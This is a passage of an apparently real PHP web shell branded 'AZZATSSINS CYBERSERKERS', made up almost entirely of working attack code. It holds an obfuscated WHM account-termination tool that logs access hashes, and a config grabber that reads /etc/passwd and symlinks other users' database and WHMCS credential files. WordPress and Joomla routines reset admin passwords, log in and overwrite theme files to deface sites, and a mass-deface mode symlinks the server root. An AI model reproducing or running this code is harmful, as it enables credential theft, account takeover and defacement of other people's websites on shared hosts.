993. <div id="result"><form method="post">
994. <center><table border="1">
995. <textarea name="vhash" rows="20" cols="45"></textarea><p>
996.  
997. <tr>
998. <td align="center">
999. Host Name </td>
1000. <td align="center">
1001. WHM Owner</td>
1002. <td align="center">
1003. UserName</td></tr>
1004. <td align="center">
1005. <input name="vhost" type="text" size="20" value=""></td>
1006. <td align="center">
1007. <input name="vuser" type="text" s size="20" value=""></td>
1008. <td align="center">
1009. <input name="user" type="text" size="20" value="">
1010. </td></tr>
1011. <td colspan="3" align="center">
1012. <input name="azzatssins7" type="submit" value=" Terminate Account ">
1013. </td</tr></table>
1014. </form>
1015. <?php } ?>
1016.  
1017. <?php
1018. if(isset($_POST["azzatssins7"])){$jrwrgworzgb="hash";${"GLOBALS"}["grigkjkpuuni"]="II11II11II11II11";${"GLOBALS"}["linowprywf"]="II11II11II11II11";${"GLOBALS"}["pbusbfyzwdp"]="user";${"GLOBALS"}["rqkpqehfse"]="user";${"GLOBALS"}["wvsimudpc"]="II11II11II11II11";$cjbzjepsoqb="result";$ugnqwpqldbjc="virgous";${${"GLOBALS"}["grigkjkpuuni"]}=fopen("$filelog","a");${"GLOBALS"}["gvhhqrlav"]="dm2";$jfdpzsy="version";${"GLOBALS"}["ecpfkfrl"]="separator";${$ugnqwpqldbjc}=new whm;${${"GLOBALS"}["pbusbfyzwdp"]}=$_POST["vuser"];$host=$_POST["vhost"];${${"GLOBALS"}["lqfwxtwbjz"]}=$_POST["vhash"];${${"GLOBALS"}["gvhhqrlav"]}=$_POST["user"];$virgous->init($host,${${"GLOBALS"}["rqkpqehfse"]},${$jrwrgworzgb});${${"GLOBALS"}["rshhhhzdjivn"]}=$virgous->gethostname();echo"<h4>HOST NAME:</h4> $hostname <br>";$osmnlv="user";${$jfdpzsy}=$virgous->version();echo"<h4>CPANEL/WHM VERSION :</h4> $version <br>";${$cjbzjepsoqb}=$virgous->terminate(${${"GLOBALS"}["cnpybqg"]});echo"<h4>RESULT :</h4><pre>";if(${${"GLOBALS"}["rwocuxf"]}){print_r(${${"GLOBALS"}["rwocuxf"]});}else{print_r($virgous->errors);}$uswgwqeegmo="separator";${"GLOBALS"}["ptqthiwbsgx"]="II11II11II11II11";${${"GLOBALS"}["ecpfkfrl"]}="=====================================================
1019. ";${${"GLOBALS"}["jqstuo"]}="
1020. ";fwrite(${${"GLOBALS"}["linowprywf"]},${$uswgwqeegmo}."./azzatssins
1021. ".${${"GLOBALS"}["rrbcihfi"]});${"GLOBALS"}["kqonuyhyluq"]="II11II11II11II11";fwrite(${${"GLOBALS"}["ptqthiwbsgx"]},"CPANEL/WHM VERSION : ".${${"GLOBALS"}["tttkddsbp"]}."
1022. ");fwrite(${${"GLOBALS"}["cemjvape"]},"HOSTNAME : ".$host."
1023. ");fwrite(${${"GLOBALS"}["cemjvape"]},"WHM OWNER : ".${$osmnlv}."
1024. ");fwrite(${${"GLOBALS"}["cemjvape"]},"ACCESS HASH : ".${${"GLOBALS"}["jqstuo"]});fwrite(${${"GLOBALS"}["kqonuyhyluq"]},${${"GLOBALS"}["lqfwxtwbjz"]}."
1025. ");fwrite(${${"GLOBALS"}["cemjvape"]},"
1026. ");fclose(${${"GLOBALS"}["wvsimudpc"]});}
1027. ?>
1028.  
1029. <?php
1030. if(isset($_GET['azzatssins'])){
1031. echo '<font face="Audiowide" size="5" color="red"><b> Good Bye !</b></font><br /><br />';
1032. $killme=basename($_SERVER['SCRIPT_NAME']);
1033. unlink($killme);
1034. }
1035. ?>
1036.  
1037. <h3> Thanks To : Arrash Hemmat</h3>
1038. </pre></td></table>
1039. </td></tr></table></center>
1040. </body>
1041. </html>
1042. <?php }
1043.  
1044. if($_GET['AZZATSSINS']=="CONFIGRABBER"){
1045. ?>
1046. <title>ConfiGrabber V2 by AZZATSSINS</title><body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br><br><form method="post"><input style="margin:1px;padding:3px;max-width:90%;font-size:12px;background:#fff;width:60%;color:#333;border-radius:5px;border:3px solid #ddd;text-align:center" type="hidden" cols="100" rows="100" name="passwd" value="<?php $usr=file("/etc/passwd"); foreach($usr as $usrr) { $str=explode(":",$usrr); echo $str[0]."\n"; } ?>
1047. "><br>Your Folder : <input type="text" class="input" name="folfig" size="10" value="CONFIGRAB">
1048. <input style="background:dodgerblue;margin:1px;width:15%;padding:6px;color:#fff;border:0;font-weight:bold;" name="conf" class="ipt" value="EXECUTE" type="submit"><br><br></form></center>
1049. <?php @ini_set('html_errors',0); @ini_set('max_execution_time',0); @ini_set('display_errors', 0); @ini_set('file_uploads',1);
1050. if ($_POST['conf']) {
1051. $folfig = $_POST['folfig'];
1052. $functions=@ini_get("disable_functions"); if(eregi("symlink",$functions)){die ('<font color=red>Symlnk Has Been Disable...!!!</font>');}
1053. @mkdir($folfig, 0755);
1054. @chdir($folfig);
1055. $htaccess="Options Indexes FollowSymLinks\nDirectoryIndex azzatssins.cyberserkers\nAddType txt .php\nAddHandler txt .php";
1056. file_put_contents(".htaccess",$htaccess,FILE_APPEND);
1057. $passwd=explode("\n",$_POST["passwd"]);
1058. foreach($passwd as $pwd){ $user=trim($pwd);
1059. copy('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
1060. symlink('/home/'.$user.'/.my.cnf',$user.' <~ CPANEL');
1061. copy('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
1062. symlink('/home/'.$user.'/.accesshash',$user.' <~ WHMCS.txt');
1063. symlink('/home/'.$user.'/public_html/suspended.page/index.html',$user.' <~ RESELLER.txt');
1064. symlink('/home/'.$user.'/public_html/.accesshash',$user.' <~ RESELLER.txt');
1065. symlink('/home/'.$user.'/public_html/wp-config.php',$user.' <~ WORDPRESS.txt');
1066. symlink('/home/'.$user.'/public_html/configuration.php',$user.' <~ WHMCS or JOOMLA.txt');
1067. symlink('/home/'.$user.'/public_html/account/configuration.php',$user.' <~ WHMCS.txt');
1068. symlink('/home/'.$user.'/public_html/accounts/configuration.php',$user.' <~ WHMCS.txt');
1069. symlink('/home/'.$user.'/public_html/central/configuration.php',$user.' <~ WHMCS.txt');
1070. symlink('/home/'.$user.'/public_html/clienti/configuration.php',$user.' <~ WHMCS.txt');
1071. symlink('/home/'.$user.'/public_html/client/configuration.php',$user.' <~ WHMCS.txt');
1072. symlink('/home/'.$user.'/public_html/cliente/configuration.php',$user.' <~ WHMCS.txt');
1073. symlink('/home/'.$user.'/public_html/clientes/configuration.php',$user.' <~ WHMCS.txt');
1074. symlink('/home/'.$user.'/public_html/clients/configuration.php',$user.' <~ WHMCS.txt');
1075. symlink('/home/'.$user.'/public_html/clientarea/configuration.php',$user.' <~ WHMCS.txt');
1076. symlink('/home/'.$user.'/public_html/clientsarea/configuration.php',$user.' <~ WHMCS.txt');
1077. symlink('/home/'.$user.'/public_html/client-area/configuration.php',$user.' <~ WHMCS.txt');
1078. symlink('/home/'.$user.'/public_html/clients-area/configuration.php',$user.' <~ WHMCS.txt');
1079. symlink('/home/'.$user.'/public_html/clientzone/configuration.php',$user.' <~ WHMCS.txt');
1080. symlink('/home/'.$user.'/public_html/client-zone/configuration.php',$user.' <~ WHMCS.txt');
1081. symlink('/home/'.$user.'/public_html/core/configuration.php',$user.' <~ WHMCS.txt');
1082. symlink('/home/'.$user.'/public_html/company/configuration.php',$user.' <~ WHMCS.txt');
1083. symlink('/home/'.$user.'/public_html/customer/configuration.php',$user.' <~ WHMCS.txt');
1084. symlink('/home/'.$user.'/public_html/customers/configuration.php',$user.' <~ WHMCS.txt');
1085. symlink('/home/'.$user.'/public_html/bill/configuration.php',$user.' <~ WHMCS.txt');
1086. symlink('/home/'.$user.'/public_html/billing/configuration.php',$user.' <~ WHMCS.txt');
1087. symlink('/home/'.$user.'/public_html/finance/configuration.php',$user.' <~ WHMCS.txt');
1088. symlink('/home/'.$user.'/public_html/financeiro/configuration.php',$user.' <~ WHMCS.txt');
1089. symlink('/home/'.$user.'/public_html/host/configuration.php',$user.' <~ WHMCS.txt');
1090. symlink('/home/'.$user.'/public_html/hosts/configuration.php',$user.' <~ WHMCS.txt');
1091. symlink('/home/'.$user.'/public_html/hosting/configuration.php',$user.' <~ WHMCS.txt');
1092. symlink('/home/'.$user.'/public_html/hostings/configuration.php',$user.' <~ WHMCS.txt'-26);
1093. symlink('/home/'.$user.'/public_html/klien/configuration.php',$user.' <~ WHMCS.txt');
1094. symlink('/home/'.$user.'/public_html/manage/configuration.php',$user.' <~ WHMCS.txt');
1095. symlink('/home/'.$user.'/public_html/manager/configuration.php',$user.' <~ WHMCS.txt');
1096. symlink('/home/'.$user.'/public_html/member/configuration.php',$user.' <~ WHMCS.txt');
1097. symlink('/home/'.$user.'/public_html/members/configuration.php',$user.' <~ WHMCS.txt');
1098. symlink('/home/'.$user.'/public_html/my/configuration.php',$user.' <~ WHMCS.txt');
1099. symlink('/home/'.$user.'/public_html/myaccount/configuration.php',$user.' <~ WHMCS.txt');
1100. symlink('/home/'.$user.'/public_html/my-account/client/configuration.php',$user.' <~ WHMCS.txt');
1101. symlink('/home/'.$user.'/public_html/myaccounts/configuration.php',$user.' <~ WHMCS.txt');
1102. symlink('/home/'.$user.'/public_html/my-accounts/configuration.php',$user.' <~ WHMCS.txt');
1103. symlink('/home/'.$user.'/public_html/order/configuration.php',$user.' <~ WHMCS.txt');
1104. symlink('/home/'.$user.'/public_html/orders/configuration.php',$user.' <~ WHMCS.txt');
1105. symlink('/home/'.$user.'/public_html/painel/configuration.php',$user.' <~ WHMCS.txt');
1106. symlink('/home/'.$user.'/public_html/panel/configuration.php',$user.' <~ WHMCS.txt');
1107. symlink('/home/'.$user.'/public_html/panels/configuration.php',$user.' <~ WHMCS.txt');
1108. symlink('/home/'.$user.'/public_html/portal/configuration.php',$user.' <~ WHMCS.txt');
1109. symlink('/home/'.$user.'/public_html/portals/configuration.php',$user.' <~ WHMCS.txt');
1110. symlink('/home/'.$user.'/public_html/secure/configuration.php',$user.' <~ WHMCS.txt');
1111. symlink('/home/'.$user.'/public_html/support/configuration.php',$user.' <~ WHMCS.txt');
1112. symlink('/home/'.$user.'/public_html/supporte/configuration.php',$user.' <~ WHMCS.txt');
1113. symlink('/home/'.$user.'/public_html/supports/configuration.php',$user.' <~ WHMCS.txt');
1114. symlink('/home/'.$user.'/public_html/web/configuration.php',$user.' <~ WHMCS.txt');
1115. symlink('/home/'.$user.'/public_html/webhost/configuration.php',$user.' <~ WHMCS.txt');
1116. symlink('/home/'.$user.'/public_html/webhosting/configuration.php',$user.' <~ WHMCS.txt');
1117. symlink('/home/'.$user.'/public_html/whm/configuration.php',$user.' <~ WHMCS.txt');
1118. symlink('/home/'.$user.'/public_html/whmcs/configuration.php',$user.' <~ WHMCS.txt');
1119. symlink('/home/'.$user.'/public_html/whmcs2/configuration.php',$user.' <~ WHMCS.txt');
1120. symlink('/home/'.$user.'/public_html/Whm/configuration.php',$user.' <~ WHMCS.txt');
1121. symlink('/home/'.$user.'/public_html/Whmcs/configuration.php',$user.' <~ WHMCS.txt');
1122. symlink('/home/'.$user.'/public_html/WHM/configuration.php',$user.' <~ WHMCS.txt');
1123. symlink('/home/'.$user.'/public_html/WHMCS/configuration.php',$user.' <~ WHMCS.txt');
1124. }
1125. echo '<center> PROCESS DONE, You Can Go To The Fucking Folder <a href='.$folfig.'>'.$folfig.'</a> And View You The GodDamn Grab Configs...!!! <br> <marquee><font color=red><a href=http://fb.me/AZZATSSINS.CYBERSERKERS>^_^ / Bye.....</a></font></marquee></center>';
1126. }
1127.  
1128. }
1129. if($_GET['jo']=="wp"){
1130. error_reporting(0);
1131. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
1132. $ar0=explode($marqueurDebutLien, $text);
1133. $ar1=explode($marqueurFinLien, $ar0[$i]);
1134. return trim($ar1[0]);
1135. }
1136.  
1137. function randomt() {
1138. $chars = "abcdefghijkmnopqrstuvwxyz023456789";
1139. srand((double)microtime()*1000000);
1140. $i = 0;
1141. $pass = '';
1142. while ($i <= 7) {
1143. $num = rand() % 33;
1144. $tmp = substr($chars, $num, 1);
1145. $pass = $pass . $tmp;
1146. $i++;
1147. }
1148. return $pass;
1149. }
1150.  
1151. function index_changer_wp($conf, $content) {
1152. $output = '';
1153. $dol = '$';
1154. $go = 0;
1155. $username = entre2v2($conf,"define('DB_USER', '","');");
1156. $password = entre2v2($conf,"define('DB_PASSWORD', '","');");
1157. $dbname = entre2v2($conf,"define('DB_NAME', '","');");
1158. $prefix = entre2v2($conf,$dol."table_prefix = '","'");
1159. $host = entre2v2($conf,"define('DB_HOST', '","');");
1160.  
1161. $link=mysql_connect($host,$username,$password);
1162. if($link) {
1163. mysql_select_db($dbname,$link) ;
1164. $dol = '$';
1165. $req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");
1166. } else {
1167. $output.= "[-] DB Error<br />";
1168. }
1169. if($req1) {
1170.  
1171. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");
1172. $data = mysql_fetch_array($req);
1173. $site_url=$data["option_value"];
1174.  
1175. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");
1176. $data = mysql_fetch_array($req);
1177. $template = $data["option_value"];
1178.  
1179. $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");
1180. $data = mysql_fetch_array($req);
1181. $current_theme = $data["option_value"];
1182.  
1183. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1184. $url2=$site_url."/wp-login.php";
1185.  
1186. $ch = curl_init();
1187. curl_setopt($ch, CURLOPT_URL, $url2);
1188. curl_setopt($ch, CURLOPT_POST, 1);
1189. curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");
1190. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1191. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1192. curl_setopt($ch, CURLOPT_HEADER, 0);
1193. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1194. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1195. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1196. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1197. $buffer = curl_exec($ch);
1198.  
1199. $pos = strpos($buffer,"action=logout");
1200. if($pos === false) {
1201. $output.= "[-] Login Error<br />";
1202. } else {
1203. $output.= "[+] Login Successful<br />";
1204. $go = 1;
1205. }
1206. if($go) {
1207. $cond = 0;
1208. $url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';
1209. curl_setopt($ch, CURLOPT_URL, $url2);
1210. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1211. curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
1212. curl_setopt($ch, CURLOPT_HEADER, 0);
1213. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1214. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1215. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1216. $buffer0 = curl_exec($ch);
1217.  
1218. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1219. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1220.  
1221. if(substr_count($_file,"/index.php") != 0){
1222. $output.= "[+] index.php loaded in Theme Editor<br />";
1223. $url2=$site_url."/wp-admin/theme-editor.php";
1224. curl_setopt($ch, CURLOPT_URL, $url2);
1225. curl_setopt($ch, CURLOPT_POST, 1);
1226. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");
1227. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1228. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1229. curl_setopt($ch, CURLOPT_HEADER, 0);
1230. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1231. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1232. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1233. $buffer = curl_exec($ch);
1234. curl_close($ch);
1235.  
1236. $pos = strpos($buffer,'<div id="message" class="updated">');
1237. if($pos === false) {
1238. $output.= "[-] Updating Index.php Error<br />";
1239. } else {
1240. $output.= "[+] Index.php Updated Successfuly<br />";
1241. $hk = explode('public_html',$_file);
1242. $output.= '[+] Deface '.file_get_contents($site_url.str_replace('/blog','',$hk[1]));
1243. $cond = 1;
1244. }
1245. } else {
1246. $url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;
1247. curl_setopt($ch, CURLOPT_URL, $url2);
1248. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
1249. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1250. curl_setopt($ch, CURLOPT_HEADER, 0);
1251. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1252. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1253. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1254. $buffer0 = curl_exec($ch);
1255.  
1256. $_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');
1257. $_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');
1258.  
1259. if(substr_count($_file,"index.php") != 0){
1260. $output.= "[+] index.php loaded in Theme Editor<br />";
1261. $url2=$site_url."/wp-admin/theme-editor.php";
1262. curl_setopt($ch, CURLOPT_URL, $url2);
1263. curl_setopt($ch, CURLOPT_POST, 1);
1264. curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");
1265. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1266. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1267. curl_setopt($ch, CURLOPT_HEADER, 0);
1268. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1269. curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");
1270. curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");
1271. $buffer = curl_exec($ch);
1272. curl_close($ch);
1273.  
1274. $pos = strpos($buffer,'<div id="message" class="updated">');
1275. if($pos === false) {
1276. $output.= "[-] Updating Index.php Error<br />";
1277. } else {
1278. $output.= "[+] Index.php Template Updated Successfuly<br />";
1279. $output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');
1280. $cond = 1;
1281. }
1282. } else {
1283. $output.= "[-] index.php can not load in Theme Editor<br />";
1284. }
1285. }
1286. }
1287. } else {
1288. $output.= "[-] DB Error<br />";
1289. }
1290. global $base_path;
1291. unlink($base_path.'COOKIE.txt');
1292. return array('cond'=>$cond, 'output'=>$output);
1293. }
1294.  
1295. function index_changer_joomla($conf, $content, $domain) {
1296. $doler = '$';
1297. $username = entre2v2($conf, $doler."user = '", "';");
1298. $password = entre2v2($conf, $doler."password = '", "';");
1299. $dbname = entre2v2($conf, $doler."db = '", "';");
1300. $prefix = entre2v2($conf, $doler."dbprefix = '", "';");
1301. $host = entre2v2($conf, $doler."host = '","';");
1302. $co=randomt();
1303. $site_url = "http://".$domain."/administrator";
1304. $output = '';
1305. $cond = 0;
1306. $link=mysql_connect($host, $username, $password);
1307. if($link) {
1308. mysql_select_db($dbname,$link) ;
1309. $req1 = mysql_query("UPDATE `".$prefix."users` SET `username` ='admin' , `password` = '4297f44b13955235245b2497399d7a93', `usertype` = 'Super Administrator', `block` = 0");
1310. $req = mysql_numrows(mysql_query("SHOW TABLES LIKE '".$prefix."extensions'"));
1311. } else {
1312. $output.= "[-] DB Error<br />";
1313. }
1314.  
1315. if($req1){
1316. if ($req) {
1317. $req = mysql_query("SELECT * from `".$prefix."template_styles` WHERE `client_id` = '0' and `home` = '1'");
1318. $data = mysql_fetch_array($req);
1319. $template_name = $data["template"];
1320.  
1321. $req = mysql_query("SELECT * from `".$prefix."extensions` WHERE `name`='".$template_name."' or `element` = '".$template_name."'");
1322. $data = mysql_fetch_array($req);
1323. $template_id = $data["extension_id"];
1324.  
1325. $url2=$site_url."/index.php";
1326. $ch = curl_init();
1327. curl_setopt($ch, CURLOPT_URL, $url2);
1328. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1329. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1330. curl_setopt($ch, CURLOPT_HEADER, 0);
1331. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1332. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1333. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1334. $buffer = curl_exec($ch);
1335. $return = entre2v2($buffer ,'<input type="hidden" name="return" value="','"');
1336. $hidden = entre2v2($buffer ,'<input type="hidden" name="','" value="1"',4);
1337.  
1338. if($return && $hidden) {
1339. curl_setopt($ch, CURLOPT_URL, $url2);
1340. curl_setopt($ch, CURLOPT_POST, 1);
1341. curl_setopt($ch, CURLOPT_REFERER, $url2);
1342. curl_setopt($ch, CURLOPT_POSTFIELDS, "username=admin&passwd=123123&option=com_login&task=login&return=".$return."&".$hidden."=1");
1343. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1344. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1345. curl_setopt($ch, CURLOPT_HEADER, 0);
1346. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1347. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1348. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1349. $buffer = curl_exec($ch);
1350. $pos = strpos($buffer,"com_config");
1351. if($pos === false) {
1352. $output.= "[-] Login Error<br />";
1353. } else {
1354. $output.= "[+] Login Successful<br />";
1355. }
1356. }
1357. if($pos){
1358. $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php");
1359. $ch = curl_init();
1360. curl_setopt($ch, CURLOPT_URL, $url2);
1361. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1362. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1363. curl_setopt($ch, CURLOPT_HEADER, 0);
1364. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1365. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1366. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1367. $buffer = curl_exec($ch);
1368.  
1369. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',2);
1370. if($hidden2) {
1371. $output.= "[+] index.php file found in Theme Editor<br />";
1372. } else {
1373. $output.= "[-] index.php Not found in Theme Editor<br />";
1374. }
1375. }
1376. if($hidden2) {
1377. $url2=$site_url."/index.php?option=com_templates&layout=edit";
1378. $ch = curl_init();
1379. curl_setopt($ch, CURLOPT_URL, $url2);
1380. curl_setopt($ch, CURLOPT_POST, 1);
1381. curl_setopt($ch, CURLOPT_POSTFIELDS,"jform[source]=".$content."&jform[filename]=index.php&jform[extension_id]=".$template_id."&".$hidden2."=1&task=source.save");
1382. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1383. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1384. curl_setopt($ch, CURLOPT_HEADER, 0);
1385. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1386. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1387. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1388. $buffer = curl_exec($ch);
1389. curl_close($ch);
1390.  
1391. $pos = strpos($buffer,'<dd class="message message">');
1392. $cond = 0;
1393. if($pos === false) {
1394. $output.= "[-] Updating Index.php Error<br />";
1395.  
1396. } else {
1397. $output.= "[+] Index.php Template successfully saved<br />";
1398. $cond = 1;
1399. }
1400. }
1401. }
1402. else {
1403. $req =mysql_query("SELECT * from `".$prefix."templates_menu` WHERE client_id='0'");
1404. $data = mysql_fetch_array($req);
1405. $template_name=$data["template"];
1406. $useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";
1407. $url2=$site_url."/index.php";
1408. $ch = curl_init();
1409. curl_setopt($ch, CURLOPT_URL, $url2);
1410. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1411. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1412. curl_setopt($ch, CURLOPT_HEADER, 0);
1413. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
1414. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1415. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1416. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1417. $buffer = curl_exec($ch);
1418. $hidden=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',3);
1419.  
1420. if($hidden) {
1421. curl_setopt($ch, CURLOPT_URL, $url2);
1422. curl_setopt($ch, CURLOPT_POST, 1);
1423. curl_setopt($ch, CURLOPT_POSTFIELDS,"username=admin&passwd=123456&option=com_login&task=login&".$hidden."=1");
1424. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1425. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1426. curl_setopt($ch, CURLOPT_HEADER, 0);
1427. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1428. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1429. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1430. $buffer = curl_exec($ch);
1431. $pos = strpos($buffer,"com_config");
1432. if($pos === false) {
1433. $output.= "[-] Login Error<br />";
1434. } else {
1435. $output.= "[+] Login Successful<br />";
1436. }
1437. }
1438.  
1439. if($pos) {
1440. $url2=$site_url."/index.php?option=com_templates&task=edit_source&client=0&id=".$template_name;
1441. curl_setopt($ch, CURLOPT_URL, $url2);
1442. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1443. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1444. curl_setopt($ch, CURLOPT_HEADER, 0);
1445. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1446. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1447. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1448. $buffer = curl_exec($ch);
1449. $hidden2=entre2v2($buffer ,'<input type="hidden" name="','" value="1"',6);
1450. if($hidden2) {
1451. $output.= "[+] index.php file founded in Theme Editor<br />";
1452. } else {
1453. $output.= "[-] index.php Not found in Theme Editor<br />";
1454. }
1455. }
1456.  
1457. if($hidden2) {
1458. $url2=$site_url."/index.php?option=com_templates&layout=edit";
1459. curl_setopt($ch, CURLOPT_URL, $url2);
1460. curl_setopt($ch, CURLOPT_POST, 1);
1461. curl_setopt($ch, CURLOPT_POSTFIELDS,"filecontent=".$content."&id=".$template_name."&cid[]=".$template_name."&".$hidden2."=1&task=save_source&client=0");
1462. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1463. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
1464. curl_setopt($ch, CURLOPT_HEADER, 0);
1465. curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
1466. curl_setopt($ch, CURLOPT_COOKIEJAR, $co);
1467. curl_setopt($ch, CURLOPT_COOKIEFILE, $co);
1468. $buffer = curl_exec($ch);
1469. curl_close($ch);
1470.  
1471. $pos = strpos($buffer,'<dd class="message message fade">');
1472. $cond = 0;
1473. if($pos === false) {
1474. $output.= "[-] Updating Index.php Error<br />";
1475. } else {
1476. $output.= "[+] Index.php Template successfully saved<br />";
1477. $cond = 1;
1478. }
1479. }
1480. }
1481. } else {
1482. $output.= "[-] DB Error<br />";
1483. }
1484. global $base_path;
1485. unlink($base_path.$co);
1486. return array('cond'=>$cond, 'output'=>$output);
1487. }
1488.  
1489. function exec_mode_1($def_url, $hacker) {
1490.  
1491. @mkdir('sym',0777);
1492. $wr = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
1493. $fp = @fopen ('sym/.htaccess','w');
1494. fwrite($fp, $wr);
1495. @symlink('/','sym/root');
1496. $dominios = @file_get_contents("/etc/named.conf");
1497. @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
1498. $out[1] = array_unique($out[1]);
1499. $numero_dominios = count($out[1]);
1500. echo "Total domains: $numero_dominios <br><br />";
1501. $def = file_get_contents($def_url);
1502. $def = urlencode($def);
